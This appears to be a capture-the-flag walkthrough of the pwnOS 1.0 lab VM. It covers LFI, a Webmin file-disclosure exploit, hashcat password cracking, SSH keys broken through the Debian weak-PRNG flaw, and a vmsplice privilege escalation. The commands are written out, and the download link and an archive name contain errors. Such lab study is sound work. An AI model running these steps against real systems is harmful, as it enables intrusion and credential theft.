Overview
PwnOS1.0 is boot2root deliberate vulnerable virtual machine designed by @Chronicoder for n00bs passionate about learning how system and application vulnerabilities lead to compromise. So, the goal is to root VM by exploiting found vulnerabilities and get the flag at /root/flag.txt. Reading /root/flag.txt is benchmark showing system is compromised successfully.
Download Link: https://www.vulnhub.com/entry/pwnlab-init,158/
Lab Setup:
- VMWare workstation for Virtual Machines
- Kali Linux VM in bridge mode
- pWnOS VM in bridge mode
Tools Used:
- Kali Linux VM
- netdiscover
- nmap
- hashcat
Vulnerabilities Exploited:
- Local File Inclusion
- Webmin Arbitrary File Disclosure
- Weak Passwords
- OpenSSL Predictable PRNG (CVE-2008-0166)
- Linux Kernel 2.6.17 < 2.6.24.1 – ‘vmsplice’ Local Privilege Escalation (2)
Reconnaissance
#netdiscover
Target VM IP Address: 192.168.8.102
Scanning
nmap
nmap -p- -A -oX nmap-pwnOS.xml --webxml 192.168.8.102
Nmap findings:
1- Target box is linux machine.
2- SSH server is enabled.
3- Apache server is listening on port 80.
4- webmin httpd version 0.01 is enabled on default port 10000
Exploit Path 1: Hacking website
Explore website in browser to find vulnerability for exploitation
Found file inclusion vulnerability in connect parameter of query string. LFI is exploitable.
usernames found: root, vmware, obama, osama, yomama
unfortunately, /etc/shadow, /var/log/apache2/access.log files are not accessible through website. So, can not proceed further using this path. RFI is URL file-access is disabled in the server configuration
Lets explore webmin.
Exploit Path 2: Webmin exploit
With nmap, we knew version of webmin that seems old. Lets search and use exploit.
We can Read arbitrary files with webmin exploit 2017.pl. More critical thing is, we can read any file with root privileges.
crack linux passwords with hashcat
hashcat -m 500 -a 0 -o cracked.txt --force hash.txt /usr/share/wordlists/sqlmap.txt
vmware passowrd is cracked.
ssh access is granted
Epxloit Path 3: SSH autorized keys
Since, we already know usernames on server. Lets try to read ssh authorized keys for known users.
since, authorized keys are accesible, lets try exploit
https://www.exploit-db.com/exploits/5720/
To use exploit, we must download database mentioned in exploit prior to execute exploit from this location and decompress.
#wget https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/5622.tar.bz2
#tar vxjf 5622.tar.bz1
search ssh authrozed keys through this database
dcbe2a56e8cdea6d17495f6648329ee2-4679.pub
login with keys
ssh -i dcbe2a56e8cdea6d17495f6648329ee2-4679 obama@192.168.8.102
Privilege Escalation
searchsploit linux vmsplice
We already have secure shell access for vmware and obama user accounts on target box. Lets upload exploit code 5092.c on server, compile and execute exploit.
Congrats… ! We are root!
Conclusion
This was excellent boot2root VM. I learned a lot and thanks to @Chronicoder for putting effort designing such a great VM for students like me to learn and practice security concepts.